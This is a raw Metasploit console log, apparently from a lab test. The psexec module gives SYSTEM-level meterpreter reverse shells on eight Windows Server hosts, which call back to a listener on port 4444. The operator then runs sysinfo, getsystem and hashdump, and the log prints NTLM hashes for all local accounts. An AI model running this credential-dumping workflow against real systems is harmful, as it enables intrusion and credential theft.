``` msf6 exploit(windows/smb/psexec) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 66 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN1809X64 10.5.135.201:4444 -> 10.5.134.101:49688 (10.5.134.101) 67 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2012X64 10.5.135.201:4444 -> 10.5.134.102:49162 (10.5.134.102) 68 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2012R2X64 10.5.135.201:4444 -> 10.5.134.120:49161 (10.5.134.120) 69 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2019X64 10.5.135.201:4444 -> 10.5.134.147:49702 (10.5.134.147) 70 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN1709X64 10.5.135.201:4444 -> 10.5.134.168:49683 (10.5.134.168) 71 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2012R2X64SP1 10.5.135.201:4444 -> 10.5.134.169:49161 (10.5.134.169) 72 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2016X64 10.5.135.201:4444 -> 10.5.134.187:49698 (10.5.134.187) 73 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN1803X64 10.5.135.201:4444 -> 10.5.134.200:49683 (10.5.134.200) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 66 (10.5.134.101) Computer : WIN1809X64 OS : Windows Server 2019 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 67 (10.5.134.102) Computer : WIN2012X64 OS : Windows Server 2012 (6.2 Build 9200). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 68 (10.5.134.120) Computer : WIN2012R2X64 OS : Windows Server 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 69 (10.5.134.147) Computer : WIN2019X64 OS : Windows Server 2019 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 70 (10.5.134.168) Computer : WIN1709X64 OS : Windows Server 2016 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 71 (10.5.134.169) Computer : WIN2012R2X64SP1 OS : Windows Server 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 72 (10.5.134.187) Computer : WIN2016X64 OS : Windows Server 2016 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 73 (10.5.134.200) Computer : WIN1803X64 OS : Windows Server 2016 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 66 (10.5.134.101) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 67 (10.5.134.102) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 68 (10.5.134.120) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 69 (10.5.134.147) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 70 (10.5.134.168) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 71 (10.5.134.169) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 72 (10.5.134.187) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 73 (10.5.134.200) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 66 (10.5.134.101) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 67 (10.5.134.102) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 68 (10.5.134.120) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 69 (10.5.134.147) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 70 (10.5.134.168) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 71 (10.5.134.169) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 72 (10.5.134.187) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 73 (10.5.134.200) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 66 (10.5.134.101) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Running 'hashdump' on meterpreter session 67 (10.5.134.102) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 68 (10.5.134.120) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 69 (10.5.134.147) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:034f2b5ffc5e7a78c6734d2ddd8c001f::: [*] Running 'hashdump' on meterpreter session 70 (10.5.134.168) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Running 'hashdump' on meterpreter session 71 (10.5.134.169) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 72 (10.5.134.187) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 73 (10.5.134.200) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msf6 exploit(windows/smb/psexec) > msf6 exploit(windows/smb/psexec) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 75 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN1809X64 10.5.135.201:4444 -> 10.5.134.101:49689 (10.5.134.101) 76 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2012X64 10.5.135.201:4444 -> 10.5.134.102:49163 (10.5.134.102) 77 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2012R2X64 10.5.135.201:4444 -> 10.5.134.120:49162 (10.5.134.120) 78 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2019X64 10.5.135.201:4444 -> 10.5.134.147:49703 (10.5.134.147) 79 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN1709X64 10.5.135.201:4444 -> 10.5.134.168:49684 (10.5.134.168) 80 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2012R2X64SP1 10.5.135.201:4444 -> 10.5.134.169:49162 (10.5.134.169) 81 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN2016X64 10.5.135.201:4444 -> 10.5.134.187:49699 (10.5.134.187) 82 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN1803X64 10.5.135.201:4444 -> 10.5.134.200:49685 (10.5.134.200) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 75 (10.5.134.101) Computer : WIN1809X64 OS : Windows Server 2019 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 76 (10.5.134.102) Computer : WIN2012X64 OS : Windows Server 2012 (6.2 Build 9200). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 77 (10.5.134.120) Computer : WIN2012R2X64 OS : Windows Server 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 78 (10.5.134.147) Computer : WIN2019X64 OS : Windows Server 2019 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 79 (10.5.134.168) Computer : WIN1709X64 OS : Windows Server 2016 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 80 (10.5.134.169) Computer : WIN2012R2X64SP1 OS : Windows Server 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 81 (10.5.134.187) Computer : WIN2016X64 OS : Windows Server 2016 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 82 (10.5.134.200) Computer : WIN1803X64 OS : Windows Server 2016 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 75 (10.5.134.101) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 76 (10.5.134.102) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 77 (10.5.134.120) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 78 (10.5.134.147) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 79 (10.5.134.168) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 80 (10.5.134.169) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 81 (10.5.134.187) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 82 (10.5.134.200) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 75 (10.5.134.101) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 76 (10.5.134.102) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 77 (10.5.134.120) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 78 (10.5.134.147) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 79 (10.5.134.168) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 80 (10.5.134.169) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 81 (10.5.134.187) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 82 (10.5.134.200) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 75 (10.5.134.101) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: 